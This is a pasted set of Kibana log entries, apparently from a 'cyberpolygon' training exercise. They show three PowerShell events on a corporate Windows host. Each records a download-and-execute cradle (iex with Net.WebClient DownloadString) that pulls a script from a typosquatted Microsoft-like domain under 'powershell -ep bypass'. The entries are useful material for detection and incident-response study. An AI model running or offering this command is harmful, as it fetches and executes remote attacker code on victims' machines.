https://pastein.ru/t/EY8
Загрузка данных
Apr 17, 2024 @ 12:52:46.235
type:
wineventlog
@timestamp:
Apr 17, 2024 @ 12:52:46.235
winlog.keywords:
Classic
winlog.channel:
Windows PowerShell
winlog.api:
wineventlog
winlog.record_id:
1,289
winlog.opcode:
Info
winlog.event_data.param1:
iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1")
winlog.event_data.param3:
CommandInvocation(Invoke-Expression): "Invoke-Expression"
winlog.event_data.param2:
DetailSequence=1 DetailTotal=2 SequenceNumber=891 UserId=FERRUMFOX\maslov-o HostName=ConsoleHost HostVersion=5.1.19041.4291 HostId=caab5788-d9f9-4f40-956d-226e78d129dc HostApplication=powershell -ep bypass EngineVersion=5.1.19041.4291 RunspaceId=9ee7a641-1d35-49fa-af70-6bfa6a8bad42 PipelineId=71 ScriptName= CommandLine=iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1")
winlog.computer_name:
maslov-o-pc.ferrumfox.corp
winlog.task:
Pipeline Execution Details
winlog.event_id:
800
winlog.provider_name:
PowerShell
log.level:
information
host.name:
maslov-o-pc.ferrumfox.corp
host.id:
47d68211-05ac-417f-b800-36a9b19f714b
host.hostname:
maslov-o-pc
host.architecture:
x86_64
host.ip:
10.181.21.46
host.os.name:
Windows 10 Pro
host.os.platform:
windows
host.os.version:
10.0
host.os.kernel:
10.0.19041.4291 (WinBuild.160101.0800)
host.os.build:
19045.4291
host.os.family:
windows
host.mac:
fa:16:3e:8a:ea:03
@version:
1
event.provider:
PowerShell
event.original:
Pipeline execution details for command line: iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1"). Context Information: DetailSequence=1 DetailTotal=2 SequenceNumber=891 UserId=FERRUMFOX\maslov-o HostName=ConsoleHost HostVersion=5.1.19041.4291 HostId=caab5788-d9f9-4f40-956d-226e78d129dc HostApplication=powershell -ep bypass EngineVersion=5.1.19041.4291 RunspaceId=9ee7a641-1d35-49fa-af70-6bfa6a8bad42 PipelineId=71 ScriptName= CommandLine=iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1") Details: CommandInvocation(Invoke-Expression): "Invoke-Expression"
event.action:
Pipeline Execution Details
event.kind:
event
event.created:
Apr 17, 2024 @ 12:52:46.597
event.code:
800
_id:
O48d7I4BjcmPCGzW7JFb
_type:
_doc
_index:
cyberpolygon-ferrumfox-win
_score:
-
Expanded document
View surrounding documents
View single document
@timestamp
Apr 17, 2024 @ 12:52:46.235
@version
1
_id
O48d7I4BjcmPCGzW7JFb
_index
cyberpolygon-ferrumfox-win
_score
-
_type
_doc
event.action
Pipeline Execution Details
event.code
800
event.created
Apr 17, 2024 @ 12:52:46.597
event.kind
event
event.original
Pipeline execution details for command line: iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1").
Context Information:
DetailSequence=1
DetailTotal=2
SequenceNumber=891
UserId=FERRUMFOX\maslov-o
HostName=ConsoleHost
HostVersion=5.1.19041.4291
HostId=caab5788-d9f9-4f40-956d-226e78d129dc
HostApplication=powershell -ep bypass
EngineVersion=5.1.19041.4291
RunspaceId=9ee7a641-1d35-49fa-af70-6bfa6a8bad42
PipelineId=71
ScriptName=
CommandLine=iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1")
Details:
CommandInvocation(Invoke-Expression): "Invoke-Expression"
event.provider
PowerShell
host.architecture
x86_64
host.hostname
maslov-o-pc
host.id
47d68211-05ac-417f-b800-36a9b19f714b
host.ip
10.181.21.46
host.mac
fa:16:3e:8a:ea:03
host.name
maslov-o-pc.ferrumfox.corp
host.os.build
19045.4291
host.os.family
windows
host.os.kernel
10.0.19041.4291 (WinBuild.160101.0800)
host.os.name
Windows 10 Pro
host.os.platform
windows
host.os.version
10.0
log.level
information
type
wineventlog
winlog.api
wineventlog
winlog.channel
Windows PowerShell
winlog.computer_name
maslov-o-pc.ferrumfox.corp
winlog.event_data.param1
iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1")
winlog.event_data.param2
DetailSequence=1
DetailTotal=2
SequenceNumber=891
UserId=FERRUMFOX\maslov-o
HostName=ConsoleHost
HostVersion=5.1.19041.4291
HostId=caab5788-d9f9-4f40-956d-226e78d129dc
HostApplication=powershell -ep bypass
EngineVersion=5.1.19041.4291
RunspaceId=9ee7a641-1d35-49fa-af70-6bfa6a8bad42
PipelineId=71
ScriptName=
CommandLine=iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1")
winlog.event_data.param3
CommandInvocation(Invoke-Expression): "Invoke-Expression"
winlog.event_id
800
winlog.keywords
Classic
winlog.opcode
Info
winlog.provider_name
PowerShell
winlog.record_id
1,289
winlog.task
Pipeline Execution Details
Apr 17, 2024 @ 12:52:44.840
type:
wineventlog
@timestamp:
Apr 17, 2024 @ 12:52:44.840
winlog.keywords:
Classic
winlog.channel:
Windows PowerShell
winlog.record_id:
903
winlog.api:
wineventlog
winlog.computer_name:
maslov-o-pc.ferrumfox.corp
winlog.event_data.param1:
iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1")
winlog.event_data.param3:
CommandInvocation(New-Object): "New-Object" ParameterBinding(New-Object): name="TypeName"; value="Net.WebClient"
winlog.event_data.param2:
DetailSequence=1 DetailTotal=1 SequenceNumber=157 UserId=FERRUMFOX\maslov-o HostName=ConsoleHost HostVersion=5.1.19041.4291 HostId=caab5788-d9f9-4f40-956d-226e78d129dc HostApplication=powershell -ep bypass EngineVersion=5.1.19041.4291 RunspaceId=9ee7a641-1d35-49fa-af70-6bfa6a8bad42 PipelineId=71 ScriptName= CommandLine=iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1")
winlog.opcode:
Info
winlog.task:
Pipeline Execution Details
winlog.event_id:
800
winlog.provider_name:
PowerShell
log.level:
information
host.id:
47d68211-05ac-417f-b800-36a9b19f714b
host.name:
maslov-o-pc.ferrumfox.corp
host.hostname:
maslov-o-pc
host.architecture:
x86_64
host.ip:
10.181.21.46
host.os.name:
Windows 10 Pro
host.os.platform:
windows
host.os.version:
10.0
host.os.kernel:
10.0.19041.4291 (WinBuild.160101.0800)
host.os.build:
19045.4291
host.os.family:
windows
host.mac:
fa:16:3e:8a:ea:03
@version:
1
event.provider:
PowerShell
event.original:
Pipeline execution details for command line: iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1"). Context Information: DetailSequence=1 DetailTotal=1 SequenceNumber=157 UserId=FERRUMFOX\maslov-o HostName=ConsoleHost HostVersion=5.1.19041.4291 HostId=caab5788-d9f9-4f40-956d-226e78d129dc HostApplication=powershell -ep bypass EngineVersion=5.1.19041.4291 RunspaceId=9ee7a641-1d35-49fa-af70-6bfa6a8bad42 PipelineId=71 ScriptName= CommandLine=iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1") Details: CommandInvocation(New-Object): "New-Object" ParameterBinding(New-Object): name="TypeName"; value="Net.WebClient"
event.action:
Pipeline Execution Details
event.kind:
event
event.created:
Apr 17, 2024 @ 12:52:45.220
event.code:
800
_id:
xI8d7I4BjcmPCGzW542m
_type:
_doc
_index:
cyberpolygon-ferrumfox-win
_score:
-
Expanded document
View surrounding documents
View single document
@timestamp
Apr 17, 2024 @ 12:52:44.840
@version
1
_id
xI8d7I4BjcmPCGzW542m
_index
cyberpolygon-ferrumfox-win
_score
-
_type
_doc
event.action
Pipeline Execution Details
event.code
800
event.created
Apr 17, 2024 @ 12:52:45.220
event.kind
event
event.original
Pipeline execution details for command line: iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1").
Context Information:
DetailSequence=1
DetailTotal=1
SequenceNumber=157
UserId=FERRUMFOX\maslov-o
HostName=ConsoleHost
HostVersion=5.1.19041.4291
HostId=caab5788-d9f9-4f40-956d-226e78d129dc
HostApplication=powershell -ep bypass
EngineVersion=5.1.19041.4291
RunspaceId=9ee7a641-1d35-49fa-af70-6bfa6a8bad42
PipelineId=71
ScriptName=
CommandLine=iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1")
Details:
CommandInvocation(New-Object): "New-Object"
ParameterBinding(New-Object): name="TypeName"; value="Net.WebClient"
event.provider
PowerShell
host.architecture
x86_64
host.hostname
maslov-o-pc
host.id
47d68211-05ac-417f-b800-36a9b19f714b
host.ip
10.181.21.46
host.mac
fa:16:3e:8a:ea:03
host.name
maslov-o-pc.ferrumfox.corp
host.os.build
19045.4291
host.os.family
windows
host.os.kernel
10.0.19041.4291 (WinBuild.160101.0800)
host.os.name
Windows 10 Pro
host.os.platform
windows
host.os.version
10.0
log.level
information
type
wineventlog
winlog.api
wineventlog
winlog.channel
Windows PowerShell
winlog.computer_name
maslov-o-pc.ferrumfox.corp
winlog.event_data.param1
iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1")
winlog.event_data.param2
DetailSequence=1
DetailTotal=1
SequenceNumber=157
UserId=FERRUMFOX\maslov-o
HostName=ConsoleHost
HostVersion=5.1.19041.4291
HostId=caab5788-d9f9-4f40-956d-226e78d129dc
HostApplication=powershell -ep bypass
EngineVersion=5.1.19041.4291
RunspaceId=9ee7a641-1d35-49fa-af70-6bfa6a8bad42
PipelineId=71
ScriptName=
CommandLine=iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1")
winlog.event_data.param3
CommandInvocation(New-Object): "New-Object"
ParameterBinding(New-Object): name="TypeName"; value="Net.WebClient"
winlog.event_id
800
winlog.keywords
Classic
winlog.opcode
Info
winlog.provider_name
PowerShell
winlog.record_id
903
winlog.task
Pipeline Execution Details
Apr 17, 2024 @ 12:52:44.819
type:
wineventlog
@timestamp:
Apr 17, 2024 @ 12:52:44.819
winlog.provider_name:
Microsoft-Windows-PowerShell
winlog.record_id:
1,109
winlog.channel:
Microsoft-Windows-PowerShell/Operational
winlog.computer_name:
maslov-o-pc.ferrumfox.corp
winlog.opcode:
On create calls
winlog.event_data.ScriptBlockId:
c3bc8616-d2dc-40e9-82c5-9a0d821c3f49
winlog.event_data.ScriptBlockText:
iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1")
winlog.event_data.MessageNumber:
1
winlog.event_data.MessageTotal:
1
winlog.user.name:
maslov-o
winlog.user.type:
User
winlog.user.identifier:
S-1-5-21-2213792943-3978625667-3641601853-1107
winlog.user.domain:
FERRUMFOX
winlog.task:
Execute a Remote Command
winlog.provider_guid:
{a0c1853b-5c40-4b15-8766-3cf1c58f985a}
winlog.activity_id:
{eafc05f8-8ffa-0001-b0d0-fceafa8fda01}
winlog.version:
1
winlog.api:
wineventlog
winlog.event_id:
4,104
winlog.process.thread.id:
2,996
winlog.process.pid:
2,340
log.level:
verbose
host.id:
47d68211-05ac-417f-b800-36a9b19f714b
host.name:
maslov-o-pc.ferrumfox.corp
host.hostname:
maslov-o-pc
host.architecture:
x86_64
host.ip:
10.181.21.46
host.os.platform:
windows
host.os.name:
Windows 10 Pro
host.os.version:
10.0
host.os.kernel:
10.0.19041.4291 (WinBuild.160101.0800)
host.os.build:
19045.4291
host.os.family:
windows
host.mac:
fa:16:3e:8a:ea:03
@version:
1
event.provider:
Microsoft-Windows-PowerShell
event.original:
Creating Scriptblock text (1 of 1): iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1") ScriptBlock ID: c3bc8616-d2dc-40e9-82c5-9a0d821c3f49 Path:
event.action:
Execute a Remote Command
event.kind:
event
event.created:
Apr 17, 2024 @ 12:52:46.143
event.code:
4,104
_id:
yI8d7I4BjcmPCGzW542m
_type:
_doc
_index:
cyberpolygon-ferrumfox-win
_score:
-
Expanded document
View surrounding documents
View single document
@timestamp
Apr 17, 2024 @ 12:52:44.819
@version
1
_id
yI8d7I4BjcmPCGzW542m
_index
cyberpolygon-ferrumfox-win
_score
-
_type
_doc
event.action
Execute a Remote Command
event.code
4,104
event.created
Apr 17, 2024 @ 12:52:46.143
event.kind
event
event.original
Creating Scriptblock text (1 of 1):
iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1")
ScriptBlock ID: c3bc8616-d2dc-40e9-82c5-9a0d821c3f49
Path:
event.provider
Microsoft-Windows-PowerShell
host.architecture
x86_64
host.hostname
maslov-o-pc
host.id
47d68211-05ac-417f-b800-36a9b19f714b
host.ip
10.181.21.46
host.mac
fa:16:3e:8a:ea:03
host.name
maslov-o-pc.ferrumfox.corp
host.os.build
19045.4291
host.os.family
windows
host.os.kernel
10.0.19041.4291 (WinBuild.160101.0800)
host.os.name
Windows 10 Pro
host.os.platform
windows
host.os.version
10.0
log.level
verbose
type
wineventlog
winlog.activity_id
{eafc05f8-8ffa-0001-b0d0-fceafa8fda01}
winlog.api
wineventlog
winlog.channel
Microsoft-Windows-PowerShell/Operational
winlog.computer_name
maslov-o-pc.ferrumfox.corp
winlog.event_data.MessageNumber
1
winlog.event_data.MessageTotal
1
winlog.event_data.ScriptBlockId
c3bc8616-d2dc-40e9-82c5-9a0d821c3f49
winlog.event_data.ScriptBlockText
iex(New-Object Net.WebClient).DownloadString("http://mircosoft-downloads.com/1.ps1")
winlog.event_id
4,104
winlog.opcode
On create calls
winlog.process.pid
2,340
winlog.process.thread.id
2,996
winlog.provider_guid
{a0c1853b-5c40-4b15-8766-3cf1c58f985a}
winlog.provider_name
Microsoft-Windows-PowerShell
winlog.record_id
1,109
winlog.task
Execute a Remote Command
winlog.user.domain
FERRUMFOX
winlog.user.identifier
S-1-5-21-2213792943-3978625667-3641601853-1107
winlog.user.name
maslov-o
winlog.user.type
User
winlog.version
1